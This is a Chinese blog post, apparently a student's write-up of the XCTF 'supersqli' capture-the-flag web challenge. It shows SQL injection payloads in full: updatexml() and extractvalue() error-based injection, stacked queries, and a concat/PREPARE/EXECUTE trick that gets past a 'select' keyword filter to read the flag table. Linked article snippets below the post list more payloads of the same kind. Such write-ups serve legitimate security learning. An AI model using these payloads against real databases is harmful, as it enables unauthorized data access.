【攻防世界】Web 高手进阶区 supersqli (菜鸡蛋版本)

最新推荐文章于 2024-08-03 20:32:29 发布
最新推荐文章于 2024-08-03 20:32:29 发布
阅读量330 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52513952/article/details/123118890
版权

前言

从进入高手进阶区开始,就越发觉得自己会的东西好少,php之前没学过,导致我压根看不懂之前那些需要读懂php源码才能拿到flag的题,于是我一跳再跳,终于看到了亲切而熟悉的“sql”,一道sql注入题,应该有机会能自己拿到flag了!!然而。。。

开始注入

初始界面,点个提交查询试试看

在这里插入图片描述

出现了一段代码,这啥啊,看不懂,既然是 POST 类型的注入,那就来试试之前学过的 updatexml() 报错型注入:

1' and updatexml(1,concat(0x7e,database(),0x7e),0) #

在这里插入图片描述

结果出现下面这一行信息,我上网去查了一下 preg_match 是什么意思,文章链接在下面:
preg_match

然后我就想着去用 sqlmap 进行注入,但最后也没能成功,我不知道是不是自己没用对还是什么的,所以就暂时放弃用 sqlmap 了,接着我去 csdn 查找攻略,终于被我找到了,原文链接如下:
supersqli

下面开始按照攻略操作:
这里需要用到 堆叠注入 以及 extractvalue()报错型注入

首先使用 extractvalue() 将数据库名称注入出来

1' and extractvalue(1,concat(0x7e,database(),0x7e)) #

在这里插入图片描述

接下来使用 堆叠注入

1';show tables #

在这里插入图片描述

到这里,接下来的操作我就看不懂了。。直接抄:

1' ;show columns from `1919810931114514`# 查字段(这个表名比较可疑就查这个,字符串为表名进行操作时要加反引号)

在这里插入图片描述

1';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#

在这里插入图片描述

得到了flag

总结

虽然说最后还是没能独立完成整个注入过程,但是通过查询攻略,我学会了 堆叠注入,以及复习了 extractvalue()报错型注入,后面看不懂的,以后学的知识上去了,自然就会看懂的!

彩蛋

查看网页源代码

在这里插入图片描述

铁天下之大头
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶 10分题 url
闵行小鱼塘
10-19 1536
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是url的writeup
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1296
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
XCTF攻防世界 Web高手进阶 supersqli writeup
Senimo
04-01 1016
XCTF攻防世界 Web高手进阶 supersqli writeup supersqli 难度系数: 3.0 题目来源: 强网杯 2019 题目描述:随便注 启动靶机,打开环境: 详细writeup参考: BUUCTF [强网杯 2019] 随便注 ...
攻防世界web高手进阶supersqli——Amao~
qq_45995328的博客
09-11 158
攻防世界web高手进阶supersqli 1.判断是否存在注入: and 1=1 、and 1=2 都可以正常显示 排除整型注入 ’ 加上报错,存在字符型注入 2. 判断字段数: 1’ order by 1、2正常显示 3 – # 报错,字段数为2 3.判断显位: 1' select 1,2 不能用联合查询,使用堆叠注入 4.查看数据库 1'; show databases -- # -- 必须加; 因为原始的sql语句格式为 select 。。。 from 。。。 where inj
攻防世界web高手进阶php_rce,XCTF攻防世界_Web进阶001
weixin_39599654的博客
03-09 740
XCTF攻防世界_Web进阶001XCTF攻防世界_Web进阶001XCTF_Web_高手进阶baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.p...
攻防世界 web进阶 supersqli
m0_51395584的博客
06-16 156
攻防世界 web进阶 supersqli SQL注入中的堆叠注入。
攻防世界 web高手进阶 10分题 TimeKeeper
闵行小鱼塘
10-19 1353
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是TimeKeeper的writeup
xctf攻防世界 Web高手进阶 unfinish
l8947943的博客
01-02 4019
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
攻防世界web进阶supersqli
qq_45756971的博客
07-16 421
打开题目所给链接:首先我们先探测其有无注入: 1’ 报错 1’# 正常且为True 1’ and 1=1# 正常且为True 1’ and 1=2# 正常且为False 所以它里边存在注入。 用1’ or extractvalue(rand(),concat(0x7e,database())) #爆出数据库名: 用0’; use supersqli; show tables;爆出表明:用0’; use supersqli; show columns from 1919810931114514; #
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
WEB渗透Web突破篇-SSRF
最新发布
qq_59468567的博客
08-03 440
转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1434
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
探索WebKit之巅:开启现代网页应用的高效与兼容之旅
weixin_67239318的博客
08-03 153
随着现代网页应用的快速发展,WebKit作为先进的浏览器引擎,其在高效性和兼容性上的表现显得尤为重要。本文深入探讨了WebKit的架构和渲染机制,揭示了其在支持Web标准和提升浏览体验方面的关键技术。通过分析WebKit如何处理DOM操作、JavaScript执行与图形渲染等挑战,我们了解到优化WebKit性能不仅关乎算法和硬件的优化,还涉及网络协议和安全框架的理解。此外,本文讨论如何通过WebKit应对多设备和分辨率下的兼容性问题。掌握这些关键因素,对于开发者来说,是打造高效、兼容的现代网页应用的基础。
高德地图离线版 使用高德地图api的方法
m0_62336925的博客
08-02 340
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
攻防世界supersqli
08-09
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。 为了防御Supersqli攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值